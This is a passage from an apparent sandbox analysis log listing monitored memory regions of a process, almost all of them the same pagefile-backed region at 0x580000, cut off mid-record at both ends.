end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8543 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8544 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8545 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8546 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8547 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8548 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8549 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8550 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8551 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8552 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8553 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8554 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8555 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8556 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8557 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8558 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8559 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8560 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8561 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8562 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8563 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8564 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8565 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8566 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8567 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8568 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8569 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8570 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8571 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8572 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8573 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8574 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8575 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8576 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8577 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8578 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8579 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8580 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8581 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8582 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8583 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8584 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8585 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8586 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8587 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8588 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8593 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8594 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8595 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8596 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8597 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8598 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8599 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8600 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8601 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8602 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8603 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8604 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8605 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8606 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8607 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8608 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8609 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8613 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8614 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8615 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8616 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8617 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8618 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8619 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8620 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8621 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8622 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8623 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8624 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8625 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8626 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8627 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8628 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8629 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8630 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8631 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8632 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8633 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8634 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8635 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8636 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8637 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8638 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8639 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8640 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8641 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8642 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8643 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8644 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8645 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8646 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8647 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8648 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8649 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8650 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8651 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8652 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8653 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8654 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8655 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8656 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8657 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8658 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8659 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8660 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8661 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8662 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8663 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8664 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8665 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8666 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8667 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8668 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8669 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8670 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8671 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8672 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8673 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8674 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8675 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8678 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8679 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8680 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8681 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8682 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8683 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8684 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8685 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8686 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8687 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8688 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8689 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8690 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8691 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8692 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8693 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8694 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8695 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8696 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8697 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8698 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8699 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8700 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8701 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8702 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8703 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8704 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8705 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8706 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8707 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8708 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8709 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8710 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8711 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8712 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8713 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8714 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8716 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8717 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8718 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8719 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8720 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8721 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8722 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8723 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8724 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8725 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8726 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8727 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8728 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8729 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8730 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8731 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8732 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8733 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8734 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8735 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8736 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8737 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8738 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8739 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8740 start_va = 